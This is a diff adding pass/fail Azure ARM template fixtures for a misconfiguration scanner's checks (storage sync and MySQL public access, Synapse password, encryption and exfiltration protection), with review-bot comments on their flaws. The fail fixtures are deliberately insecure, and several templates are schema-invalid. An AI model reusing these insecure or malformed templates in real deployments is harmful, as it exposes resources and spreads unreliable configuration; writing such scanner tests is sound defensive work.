@@ -0,0 +1,61 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "metadata": { + "_generator": { + "name": "bicep", + "version": "0.13.1.58284", + "templateHash": "13120038605368246703" + } + }, + "parameters": { + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "The storage account location." + } + }, + "storageAccountName": { + "type": "string", + "defaultValue": "[format('store{0}', uniqueString(resourceGroup().id))]", + "metadata": { + "description": "The name of the storage account" + } + } + }, + "resources": [ + { + "type": "Microsoft.Storage/storageAccounts", + "apiVersion": "2022-09-01", + "name": "pass", + "location": "[parameters('location')]", + "sku": { + "name": "Standard_GRS" + }, + "kind": "StorageV2", + "properties": {} + }, + { + "type": "Microsoft.Storage/storageAccounts", + "apiVersion": "2022-09-01", + "name": "pass2", + "location": "[parameters('location')]", + "sku": { + "name": "Standard_RAGRS" + }, + "kind": "StorageV2", + "properties": {} + } + ], + "outputs": { + "storageAccountName": { + "type": "string", + "value": "[parameters('storageAccountName')]" + }, + "storageAccountId": { + "type": "string", + "value": "[resourceId('Microsoft.Storage/storageAccounts', parameters('storageAccountName'))]" + } + } +} diff --git a/tests/arm/checks/resource/example_StorageSyncPublicAccessDisabled/fail1.json b/tests/arm/checks/resource/example_StorageSyncPublicAccessDisabled/fail1.json new file mode 100644 index 00000000000..b42eb25b0b6 --- /dev/null +++ b/tests/arm/checks/resource/example_StorageSyncPublicAccessDisabled/fail1.json 
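Review bot: The positive fixtures cover only `Standard_GRS` and `Standard_RAGRS`; whether `Standard_ZRS`, `Standard_GZRS`, `Standard_RAGZRS` and `Premium_ZRS` count as "replicated" is precisely the boundary this check decides, and none of them is pinned by a test. I would add a third resource here with `"sku": { "name": "Standard_GZRS" }` and, if zone-only redundancy is meant to fail, a `fail2.json` with `Standard_ZRS`, so the intended boundary is documented by the suite rather than left to the implementation. The resources are named `pass`/`pass2` while `outputs` still resolve `parameters('storageAccountName')`, a leftover from the Bicep source that makes the template internally inconsistent.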
@@ -0,0 +1,23 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.StorageSync/storageSyncServices",
+ "apiVersion": "2021-02-01",
+ "name": "fail1",
+ "properties": {
+ "storageSyncServiceStatus": "Registered",
+ "storageSyncServiceProperties": {
+ "trustState": "Enabled",
+ "storageSyncServiceUid": "65fdd65b-ea5d-4a00-bf7f-40c41ba39ae4",
+ "provisioningState": "Succeeded"
+ },
+ "location": "East US",
+ "tags": {
+ "foo": "bar"
+ }
+ }
+ }
+ ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_StorageSyncPublicAccessDisabled/fail2.json b/tests/arm/checks/resource/example_StorageSyncPublicAccessDisabled/fail2.json
new file mode 100644
index 00000000000..07ca8e384a8
--- /dev/null
+++ b/tests/arm/checks/resource/example_StorageSyncPublicAccessDisabled/fail2.json
@@ -0,0 +1,24 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.StorageSync/storageSyncServices",
+ "apiVersion": "2021-02-01",
+ "name": "fail2",
+ "properties": {
+ "storageSyncServiceStatus": "Registered",
+ "storageSyncServiceProperties": {
+ "trustState": "Enabled",
+ "storageSyncServiceUid": "65fdd65b-ea5d-4a00-bf7f-40c41ba39ae4",
+ "provisioningState": "Succeeded"
+ },
+ "location": "East US",
+ "incomingTrafficPolicy": "AllowAllTraffic",
+ "tags": {
+ "foo": "bar"
+ }
+ }
+ }
+ ]
+}
diff --git a/tests/arm/checks/resource/example_StorageSyncPublicAccessDisabled/pass.json b/tests/arm/checks/resource/example_StorageSyncPublicAccessDisabled/pass.json
new file mode 100644
index 00000000000..ade615191c3
--- /dev/null
+++ b/tests/arm/checks/resource/example_StorageSyncPublicAccessDisabled/pass.json
@@ -0,0 +1,24 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "apiVersion": "2021-02-01",
+ "name": "pass",
+ "properties": {
+ "storageSyncServiceStatus": "Registered",
+ "storageSyncServiceProperties": {
+ "trustState": "Enabled",
+ "storageSyncServiceUid": "65fdd65b-ea5d-4a00-bf7f-40c41ba39ae4",
+ "provisioningState": "Succeeded"
+ },
+ "location": "East US",
+ "incomingTrafficPolicy": "AllowVirtualNetworksOnly",
+ "tags": {
+ "foo": "bar"
+ }
+ },
+ "type": "Microsoft.StorageSync/storageSyncServices"
+ }
+ ]
+}
diff --git a/tests/arm/checks/resource/example_SynapseWorkspaceAdministratorLoginPasswordHidden/fail.json b/tests/arm/checks/resource/example_SynapseWorkspaceAdministratorLoginPasswordHidden/fail.json
new file mode 100644
index 00000000000..43cc4ec43b4
--- /dev/null
+++ b/tests/arm/checks/resource/example_SynapseWorkspaceAdministratorLoginPasswordHidden/fail.json
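Review bot: `location` and `tags` are nested inside `properties` in this pass fixture (and in both fail fixtures of the directory) instead of being top-level resource keys, and `storageSyncServiceUid` / `provisioningState` look like read-only values the service reports rather than inputs a template would set. The check needs only `properties.incomingTrafficPolicy`, so the expected result holds, but anyone copying this as the hardened example gets a template that ARM would not accept, as far as I can tell. I would move `"location": "East US"` and the `tags` block up next to `"name": "pass"` and drop the two read-only fields.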
@@ -0,0 +1,60 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.Synapse/workspaces",
+ "apiVersion": "2021-06-01",
+ "name": "[parameters('workspaceName')]",
+ "location": "[parameters('location')]",
+ "properties": {
+ "defaultDataLakeStorage": {
+ "accountUrl": "[parameters('storageAccountUrl')]",
+ "filesystem": "[parameters('filesystem')]"
+ },
+ "sqlAdministratorLogin": "[parameters('sqlAdministratorLogin')]",
+ "sqlAdministratorLoginPassword": {
+ "value": "[parameters('sqlAdministratorLoginPassword')]"
+ }
+ }
+ }
+ ],
+ "parameters": {
+ "workspaceName": {
+ "type": "string",
+ "metadata": {
+ "description": "Name of the Synapse workspace"
+ }
+ },
+ "location": {
+ "type": "string",
+ "metadata": {
+ "description": "Location for the Synapse workspace"
+ }
+ },
+ "storageAccountUrl": {
+ "type": "string",
+ "metadata": {
+ "description": "URL of the default Data Lake Storage account"
+ }
+ },
+ "filesystem": {
+ "type": "string",
+ "metadata": {
+ "description": "Filesystem name in the Data Lake Storage account"
+ }
+ },
+ "sqlAdministratorLogin": {
+ "type": "string",
+ "metadata": {
+ "description": "SQL administrator login name"
+ }
+ },
+ "sqlAdministratorLoginPassword": {
+ "type": "securestring",
+ "metadata": {
+ "description": "SQL administrator login password"
+ }
+ }
+ }
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_SynapseWorkspaceAdministratorLoginPasswordHidden/pass.json b/tests/arm/checks/resource/example_SynapseWorkspaceAdministratorLoginPasswordHidden/pass.json
new file mode 100644
index 00000000000..7e81744ff21
--- /dev/null
+++ b/tests/arm/checks/resource/example_SynapseWorkspaceAdministratorLoginPasswordHidden/pass.json
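Review bot: The fail fixture's `"sqlAdministratorLoginPassword": { "value": "[parameters('sqlAdministratorLoginPassword')]" }` wraps a reference to a `securestring` parameter in an object, whereas the ARM property is a plain string; the fixture therefore neither matches the schema nor shows the property holding an exposed value, so it is unclear which condition the check is meant to fail on. If the intent is to flag an administrator password that is not hidden, a fail case with a literal placeholder such as `"sqlAdministratorLoginPassword": "<PLACEHOLDER_PASSWORD>"` exercises that risk directly, and the `securestring` reference arguably belongs in a pass case. The same object form is reused in the SynapseWorkspaceCMKEncryption fixtures below.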
@@ -0,0 +1,51 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.Synapse/workspaces",
+ "apiVersion": "2021-06-01",
+ "name": "[parameters('workspaceName')]",
+ "location": "[parameters('location')]",
+ "properties": {
+ "defaultDataLakeStorage": {
+ "accountUrl": "[parameters('storageAccountUrl')]",
+ "filesystem": "[parameters('filesystem')]"
+ },
+ "sqlAdministratorLogin": "[parameters('sqlAdministratorLogin')]"
+ }
+ }
+ ],
+ "parameters": {
+ "workspaceName": {
+ "type": "string",
+ "metadata": {
+ "description": "Name of the Synapse workspace"
+ }
+ },
+ "location": {
+ "type": "string",
+ "metadata": {
+ "description": "Location for the Synapse workspace"
+ }
+ },
+ "storageAccountUrl": {
+ "type": "string",
+ "metadata": {
+ "description": "URL of the default Data Lake Storage account"
+ }
+ },
+ "filesystem": {
+ "type": "string",
+ "metadata": {
+ "description": "Filesystem name in the Data Lake Storage account"
+ }
+ },
+ "sqlAdministratorLogin": {
+ "type": "string",
+ "metadata": {
+ "description": "SQL administrator login name"
+ }
+ }
+ }
+ }
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_SynapseWorkspaceCMKEncryption/fail.json b/tests/arm/checks/resource/example_SynapseWorkspaceCMKEncryption/fail.json
new file mode 100644
index 00000000000..de321703226
--- /dev/null
+++ b/tests/arm/checks/resource/example_SynapseWorkspaceCMKEncryption/fail.json
@@ -0,0 +1,68 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.Synapse/workspaces",
+ "apiVersion": "2021-06-01",
+ "name": "[parameters('workspaceName')]",
+ "location": "[parameters('location')]",
+ "properties": {
+ "defaultDataLakeStorage": {
+ "accountUrl": "[parameters('storageAccountUrl')]",
+ "filesystem": "[parameters('fileSystem')]"
+ },
+ "sqlAdministratorLogin": "[parameters('sqlAdministratorLogin')]",
+ "sqlAdministratorLoginPassword": {
+ "value": "[parameters('sqlAdministratorLoginPassword')]"
+ },
+ "managedVirtualNetwork": "[parameters('managedVirtualNetwork')]"
+ }
+ }
+ ],
+ "parameters": {
+ "workspaceName": {
+ "type": "string",
+ "metadata": {
+ "description": "Name of the Synapse workspace."
+ }
+ },
+ "location": {
+ "type": "string",
+ "metadata": {
+ "description": "Location of the Synapse workspace."
+ }
+ },
+ "storageAccountUrl": {
+ "type": "string",
+ "metadata": {
+ "description": "URL of the default Data Lake Storage account."
+ }
+ },
+ "fileSystem": {
+ "type": "string",
+ "metadata": {
+ "description": "File system name of the default Data Lake Storage account."
+ }
+ },
+ "sqlAdministratorLogin": {
+ "type": "string",
+ "metadata": {
+ "description": "SQL administrator login name."
+ }
+ },
+ "sqlAdministratorLoginPassword": {
+ "type": "securestring",
+ "metadata": {
+ "description": "SQL administrator login password."
+ }
+ },
+ "managedVirtualNetwork": {
+ "type": "string",
+ "defaultValue": "default",
+ "metadata": {
+ "description": "Managed Virtual Network name."
+ }
+ }
+ }
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_SynapseWorkspaceCMKEncryption/pass.json b/tests/arm/checks/resource/example_SynapseWorkspaceCMKEncryption/pass.json
new file mode 100644
index 00000000000..0427c914271
--- /dev/null
+++ b/tests/arm/checks/resource/example_SynapseWorkspaceCMKEncryption/pass.json 
@@ -0,0 +1,103 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.Synapse/workspaces",
+ "apiVersion": "2021-06-01",
+ "name": "[parameters('workspaceName')]",
+ "location": "[parameters('location')]",
+ "properties": {
+ "defaultDataLakeStorage": {
+ "accountUrl": "[parameters('storageAccountUrl')]",
+ "filesystem": "[parameters('fileSystem')]"
+ },
+ "sqlAdministratorLogin": "[parameters('sqlAdministratorLogin')]",
+ "sqlAdministratorLoginPassword": {
+ "value": "[parameters('sqlAdministratorLoginPassword')]"
+ },
+ "managedVirtualNetwork": "[parameters('managedVirtualNetwork')]",
+ "encryption": {
+ "cmk": {
+ "key": {
+ "name": "[parameters('keyName')]",
+ "vaultBaseUrl": "[parameters('keyVaultUrl')]"
+ },
+ "identity": {
+ "userAssignedIdentity": "[parameters('userAssignedIdentityResourceId')]"
+ }
+ }
+ }
+ },
+ "identity": {
+ "type": "UserAssigned",
+ "userAssignedIdentities": {
+ "[parameters('userAssignedIdentityResourceId')]": {}
+ }
+ }
+ }
+ ],
+ "parameters": {
+ "workspaceName": {
+ "type": "string",
+ "metadata": {
+ "description": "Name of the Synapse workspace."
+ }
+ },
+ "location": {
+ "type": "string",
+ "metadata": {
+ "description": "Location of the Synapse workspace."
+ }
+ },
+ "storageAccountUrl": {
+ "type": "string",
+ "metadata": {
+ "description": "URL of the default Data Lake Storage account."
+ }
+ },
+ "fileSystem": {
+ "type": "string",
+ "metadata": {
+ "description": "File system name of the default Data Lake Storage account."
+ }
+ },
+ "sqlAdministratorLogin": {
+ "type": "string",
+ "metadata": {
+ "description": "SQL administrator login name."
+ }
+ },
+ "sqlAdministratorLoginPassword": {
+ "type": "securestring",
+ "metadata": {
+ "description": "SQL administrator login password."
+ }
+ },
+ "managedVirtualNetwork": {
+ "type": "string",
+ "defaultValue": "default",
+ "metadata": {
+ "description": "Managed Virtual Network name."
+ }
+ },
+ "keyName": {
+ "type": "string",
+ "metadata": {
+ "description": "The name of the customer-managed key."
+ }
+ },
+ "keyVaultUrl": {
+ "type": "string",
+ "metadata": {
+ "description": "The URL of the Key Vault containing the customer-managed key."
+ }
+ },
+ "userAssignedIdentityResourceId": {
+ "type": "string",
+ "metadata": {
+ "description": "The resource ID of the user-assigned managed identity."
+ }
+ }
+ }
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_SynapseWorkspaceEnablesDataExfilProtection/fail1.json b/tests/arm/checks/resource/example_SynapseWorkspaceEnablesDataExfilProtection/fail1.json
new file mode 100644
index 00000000000..dfe817dffc3
--- /dev/null
+++ b/tests/arm/checks/resource/example_SynapseWorkspaceEnablesDataExfilProtection/fail1.json
@@ -0,0 +1,17 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.Synapse/workspaces",
+ "apiVersion": "2021-02-01",
+ "name": "fail1",
+ "location": "East US",
+ "properties": {
+ "dataExfiltrationProtectionEnabled" : "false",
+ "tags": {
+ }
+ }
+ }
+ ]
+}
diff --git a/tests/arm/checks/resource/example_SynapseWorkspaceEnablesDataExfilProtection/fail2.json b/tests/arm/checks/resource/example_SynapseWorkspaceEnablesDataExfilProtection/fail2.json
new file mode 100644
index 00000000000..eba713c6154
--- /dev/null
+++ b/tests/arm/checks/resource/example_SynapseWorkspaceEnablesDataExfilProtection/fail2.json
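Review bot: fail1.json sets `"dataExfiltrationProtectionEnabled" : "false"` as a string while pass.json (two hunks on) sets the boolean `true`; the ARM property is a boolean, so no fixture exercises the typed `false` value the property normally carries, and a check that only compares strings would pass these tests while missing a real template. A further fail fixture with `"dataExfiltrationProtectionEnabled": false` alongside the existing string case would show both forms are handled. The space before the colon in that line is valid JSON but inconsistent with the rest of the fixture, and `"tags"` is nested under `"properties"` here as well as in fail2.json and pass.json rather than at resource level.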
@@ -0,0 +1,17 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.Synapse/workspaces",
+ "apiVersion": "2021-02-01",
+ "name": "fail2",
+ "location": "East US",
+ "properties": {
+ "tags": {
+ }
+ }
+ }
+ ]
+}
+
diff --git a/tests/arm/checks/resource/example_SynapseWorkspaceEnablesDataExfilProtection/pass.json b/tests/arm/checks/resource/example_SynapseWorkspaceEnablesDataExfilProtection/pass.json
new file mode 100644
index 00000000000..dd4e580bbdf
--- /dev/null
+++ b/tests/arm/checks/resource/example_SynapseWorkspaceEnablesDataExfilProtection/pass.json
@@ -0,0 +1,19 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.Synapse/workspaces",
+ "apiVersion": "2021-02-01",
+ "name": "pass",
+ "location": "East US",
+ "properties": {
+ "dataExfiltrationProtectionEnabled": true,
+ "tags": {
+ }
+ }
+ }
+ ]
+}
+
+
diff --git a/tests/arm/checks/resource/example_TestMySQLPublicAccessDisabled/fail.json b/tests/arm/checks/resource/example_TestMySQLPublicAccessDisabled/fail.json
new file mode 100644
index 00000000000..2f14c053353
--- /dev/null
+++ b/tests/arm/checks/resource/example_TestMySQLPublicAccessDisabled/fail.json
@@ -0,0 +1,250 @@ +{ + "$schema": "http://schema.management.azure.com/schemas/2014-04-01-preview/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "apiVersion": { + "type": "string", + "defaultValue": "2021-05-01" + }, + "administratorLogin": { + "type": "string" + }, + "administratorLoginPassword": { + "type": "securestring" + }, + "location": { + "type": "string" + }, + "serverName": { + "type": "string" + }, + "serverEdition": { + "type": "string" + }, + "vCores": { + "type": "int", + "defaultValue": 4 + }, + "storageSizeGB": { + "type": "int" + }, + "haEnabled": { + "type": "string", + "defaultValue": "Disabled" + }, + "availabilityZone": { + "type": "string", + "defaultValue": "" + }, + "standbyAvailabilityZone": { + "type": "string" + }, + "version": { + "type": "string" + }, + "tags": { + "type": "object", + "defaultValue": {} + }, + "firewallRules": { + "type": "object", + "defaultValue": {} + }, + "backupRetentionDays": { + "type": "int" + }, + "geoRedundantBackup": { + "type": "string", + "defaultValue": true + }, + "vmName": { + "type": "string", + "defaultValue": "Standard_B1ms" + }, + "storageIops": { + "type": "int" + }, + "storageAutogrow": { + "type": "string", + "defaultValue": "Enabled" + }, + "autoIoScaling": { + "type": "string", + "defaultValue": "Disabled" + }, + "identityData": { + "type": "object", + "defaultValue": {} + }, + "dataEncryptionData": { + "type": "object", + "defaultValue": { + "type": "AzureKeyVault", + "primaryUserAssignedIdentityId": "/subscriptions/037ce662-dfc1-4b8b-a8a7-6c414b540ed6/resourceGroups/test/providers/Microsoft.ManagedIdentity/userAssignedIdentities/pike", + "primaryKeyURI": "https://pike3.vault.azure.net/keys/pike/ae9a3b26e89445c49fe2b92091017ba2" + } + }, + "serverParameters": { + "type": "array", + "defaultValue": [] + }, + "aadEnabled": { + "type": "bool", + "defaultValue": false + }, + "aadData": { + "type": "object", + "defaultValue": {} + }, + "guid": { + "type": "string", + 
"defaultValue": "[newGuid()]" + }, + "network": { + "type": "object", + "defaultValue": {} + }, + "firewallRulesAPIVersion": { + "type": "string", + "defaultValue": "2022-01-01" + } + }, + "variables": { + "api": "[parameters('apiVersion')]", + "firewallRules": "[parameters('firewallRules').rules]", + "serverParameters": "[parameters('serverParameters')]" + }, + "resources": [ + { + "type": "Microsoft.DBforMySQL/servers", + "apiVersion": "2017-12-01", + "name": "fail", + "location": "string", + "tags": { + "tagName1": "tagValue1", + "tagName2": "tagValue2" + }, + "{customized property}": "string", + "sku": { + "capacity": "int", + "family": "string", + "name": "string", + "size": "string", + "tier": "string" + }, + "identity": { + "type": "SystemAssigned" + }, + "properties": { + "infrastructureEncryption": "string", + "minimalTlsVersion": "string", + "publicNetworkAccess": "enabled", + "sslEnforcement": "string", + "storageProfile": { + "backupRetentionDays": "int", + "geoRedundantBackup": "string", + "storageAutogrow": "string", + "storageMB": "int" + }, + "version": "string", + "createMode": "string" + } + }, + { + "condition": "[greater(length(variables('firewallRules')), 0)]", + "type": "Microsoft.Resources/deployments", + "apiVersion": "2019-08-01", + "name": "[concat('firewallRules-', parameters('guid'), '-', copyIndex())]", + "copy": { + "count": "[if(greater(length(variables('firewallRules')), 0), length(variables('firewallRules')), 1)]", + "mode": "Serial", + "name": "firewallRulesIterator" + }, + "dependsOn": [ + "[concat('Microsoft.DBforMySQL/flexibleServers/', parameters('serverName'))]", + "[concat('Microsoft.Resources/deployments/addAdmins-', parameters('guid'))]" + ], + "properties": { + "mode": "Incremental", + "template": { + "$schema": "http://schema.management.azure.com/schemas/2014-04-01-preview/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "type": "Microsoft.DBforMySQL/flexibleServers/firewallRules", + 
"name": "[concat(parameters('serverName'),'/',variables('firewallRules')[copyIndex()].name)]", + "apiVersion": "[parameters('firewallRulesAPIVersion')]", + "properties": { + "StartIpAddress": "[variables('firewallRules')[copyIndex()].startIPAddress]", + "EndIpAddress": "[variables('firewallRules')[copyIndex()].endIPAddress]" + } + } + ] + } + } + }, + { + "condition": "[parameters('aadEnabled')]", + "type": "Microsoft.Resources/deployments", + "apiVersion": "2019-08-01", + "name": "[concat('addAdmins-', parameters('guid'))]", + "dependsOn": [ + "[concat('Microsoft.DBforMySQL/flexibleServers/', parameters('serverName'))]" + ], + "properties": { + "mode": "Incremental", + "template": { + "$schema": "http://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "type": "Microsoft.DBforMySQL/flexibleServers/administrators", + "name": "[concat(parameters('serverName'),'/ActiveDirectory')]", + "apiVersion": "[variables('api')]", + "properties": { + "administratorType": "[parameters('aadData').administratorType]", + "identityResourceId": "[parameters('aadData').identityResourceId]", + "login": "[parameters('aadData').login]", + "sid": "[parameters('aadData').sid]", + "tenantId": "[parameters('aadData').tenantId]" + } + } + ] + } + } + }, + { + "condition": "[and(greater(length(variables('serverParameters')), 0), parameters('aadEnabled'))]", + "type": "Microsoft.Resources/deployments", + "apiVersion": "2019-08-01", + "copy": { + "count": "[if(greater(length(variables('serverParameters')), 0), length(variables('serverParameters')), 1)]", + "mode": "serial", + "name": "serverParametersIterator" + }, + "dependsOn": [ + "[concat('Microsoft.DBforMySQL/flexibleServers/', parameters('serverName'))]", + "[concat('Microsoft.Resources/deployments/addAdmins-', parameters('guid'))]" + ], + "name": "[concat('serverParameters-', copyIndex(), '-', parameters('guid'))]", + "properties": { + "mode": "Incremental", + 
"template": { + "$schema": "http://schema.management.azure.com/schemas/2014-04-01-preview/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "type": "Microsoft.DBforMySQL/flexibleServers/configurations", + "name": "[concat(parameters('serverName'),'/',variables('serverParameters')[copyIndex()].name)]", + "apiVersion": "[variables('api')]", + "properties": { + "value": "[variables('serverParameters')[copyIndex()].value]", + "source": "[variables('serverParameters')[copyIndex()].source]" + } + } + ] + } + } + } + ] +} \ No newline at end of file diff --git a/tests/arm/checks/resource/example_TestMySQLPublicAccessDisabled/pass.json b/tests/arm/checks/resource/example_TestMySQLPublicAccessDisabled/pass.json new file mode 100644 index 00000000000..74538468f41 --- /dev/null +++ b/tests/arm/checks/resource/example_TestMySQLPublicAccessDisabled/pass.json 
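Review bot: The fail fixture sets `"publicNetworkAccess": "enabled"` and pass.json (next hunk) `"disabled"`, whereas the values Azure emits for this property are `Enabled`/`Disabled`; with only lowercase fixtures the tests cannot tell whether the check compares case-insensitively, so a second pass/fail pair using the capitalised values is worth adding. The `"dataEncryptionData"` default embeds a concrete subscription id, resource-group path and Key Vault key URI; test fixtures should carry obviously synthetic placeholders (e.g. `00000000-0000-0000-0000-000000000000`) so nothing real-looking is committed and later mistaken for a required value. The resource under test is `Microsoft.DBforMySQL/servers` while the `dependsOn` entries and nested deployments reference `flexibleServers`, which suggests the template was adapted from a flexible-server sample and would not deploy as written; the same applies to pass.json.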
@@ -0,0 +1,250 @@ +{ + "$schema": "http://schema.management.azure.com/schemas/2014-04-01-preview/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "apiVersion": { + "type": "string", + "defaultValue": "2021-05-01" + }, + "administratorLogin": { + "type": "string" + }, + "administratorLoginPassword": { + "type": "securestring" + }, + "location": { + "type": "string" + }, + "serverName": { + "type": "string" + }, + "serverEdition": { + "type": "string" + }, + "vCores": { + "type": "int", + "defaultValue": 4 + }, + "storageSizeGB": { + "type": "int" + }, + "haEnabled": { + "type": "string", + "defaultValue": "Disabled" + }, + "availabilityZone": { + "type": "string", + "defaultValue": "" + }, + "standbyAvailabilityZone": { + "type": "string" + }, + "version": { + "type": "string" + }, + "tags": { + "type": "object", + "defaultValue": {} + }, + "firewallRules": { + "type": "object", + "defaultValue": {} + }, + "backupRetentionDays": { + "type": "int" + }, + "geoRedundantBackup": { + "type": "string", + "defaultValue": true + }, + "vmName": { + "type": "string", + "defaultValue": "Standard_B1ms" + }, + "storageIops": { + "type": "int" + }, + "storageAutogrow": { + "type": "string", + "defaultValue": "Enabled" + }, + "autoIoScaling": { + "type": "string", + "defaultValue": "Disabled" + }, + "identityData": { + "type": "object", + "defaultValue": {} + }, + "dataEncryptionData": { + "type": "object", + "defaultValue": { + "type": "AzureKeyVault", + "primaryUserAssignedIdentityId": "/subscriptions/037ce662-dfc1-4b8b-a8a7-6c414b540ed6/resourceGroups/test/providers/Microsoft.ManagedIdentity/userAssignedIdentities/pike", + "primaryKeyURI": "https://pike3.vault.azure.net/keys/pike/ae9a3b26e89445c49fe2b92091017ba2" + } + }, + "serverParameters": { + "type": "array", + "defaultValue": [] + }, + "aadEnabled": { + "type": "bool", + "defaultValue": false + }, + "aadData": { + "type": "object", + "defaultValue": {} + }, + "guid": { + "type": "string", + 
"defaultValue": "[newGuid()]" + }, + "network": { + "type": "object", + "defaultValue": {} + }, + "firewallRulesAPIVersion": { + "type": "string", + "defaultValue": "2022-01-01" + } + }, + "variables": { + "api": "[parameters('apiVersion')]", + "firewallRules": "[parameters('firewallRules').rules]", + "serverParameters": "[parameters('serverParameters')]" + }, + "resources": [ + { + "type": "Microsoft.DBforMySQL/servers", + "apiVersion": "2017-12-01", + "name": "pass", + "location": "string", + "tags": { + "tagName1": "tagValue1", + "tagName2": "tagValue2" + }, + "{customized property}": "string", + "sku": { + "capacity": "int", + "family": "string", + "name": "string", + "size": "string", + "tier": "string" + }, + "identity": { + "type": "SystemAssigned" + }, + "properties": { + "infrastructureEncryption": "string", + "minimalTlsVersion": "string", + "publicNetworkAccess": "disabled", + "sslEnforcement": "string", + "storageProfile": { + "backupRetentionDays": "int", + "geoRedundantBackup": "string", + "storageAutogrow": "string", + "storageMB": "int" + }, + "version": "string", + "createMode": "string" + } + }, + { + "condition": "[greater(length(variables('firewallRules')), 0)]", + "type": "Microsoft.Resources/deployments", + "apiVersion": "2019-08-01", + "name": "[concat('firewallRules-', parameters('guid'), '-', copyIndex())]", + "copy": { + "count": "[if(greater(length(variables('firewallRules')), 0), length(variables('firewallRules')), 1)]", + "mode": "Serial", + "name": "firewallRulesIterator" + }, + "dependsOn": [ + "[concat('Microsoft.DBforMySQL/flexibleServers/', parameters('serverName'))]", + "[concat('Microsoft.Resources/deployments/addAdmins-', parameters('guid'))]" + ], + "properties": { + "mode": "Incremental", + "template": { + "$schema": "http://schema.management.azure.com/schemas/2014-04-01-preview/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "type": "Microsoft.DBforMySQL/flexibleServers/firewallRules", + 
"name": "[concat(parameters('serverName'),'/',variables('firewallRules')[copyIndex()].name)]", + "apiVersion": "[parameters('firewallRulesAPIVersion')]", + "properties": { + "StartIpAddress": "[variables('firewallRules')[copyIndex()].startIPAddress]", + "EndIpAddress": "[variables('firewallRules')[copyIndex()].endIPAddress]" + } + } + ] + } + } + }, + { + "condition": "[parameters('aadEnabled')]", + "type": "Microsoft.Resources/deployments", + "apiVersion": "2019-08-01", + "name": "[concat('addAdmins-', parameters('guid'))]", + "dependsOn": [ + "[concat('Microsoft.DBforMySQL/flexibleServers/', parameters('serverName'))]" + ], + "properties": { + "mode": "Incremental", + "template": { + "$schema": "http://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "type": "Microsoft.DBforMySQL/flexibleServers/administrators", + "name": "[concat(parameters('serverName'),'/ActiveDirectory')]", + "apiVersion": "[variables('api')]", + "properties": { + "administratorType": "[parameters('aadData').administratorType]", + "identityResourceId": "[parameters('aadData').identityResourceId]", + "login": "[parameters('aadData').login]", + "sid": "[parameters('aadData').sid]", + "tenantId": "[parameters('aadData').tenantId]" + } + } + ] + } + } + }, + { + "condition": "[and(greater(length(variables('serverParameters')), 0), parameters('aadEnabled'))]", + "type": "Microsoft.Resources/deployments", + "apiVersion": "2019-08-01", + "copy": { + "count": "[if(greater(length(variables('serverParameters')), 0), length(variables('serverParameters')), 1)]", + "mode": "serial", + "name": "serverParametersIterator" + }, + "dependsOn": [ + "[concat('Microsoft.DBforMySQL/flexibleServers/', parameters('serverName'))]", + "[concat('Microsoft.Resources/deployments/addAdmins-', parameters('guid'))]" + ], + "name": "[concat('serverParameters-', copyIndex(), '-', parameters('guid'))]", + "properties": { + "mode": "Incremental", + 
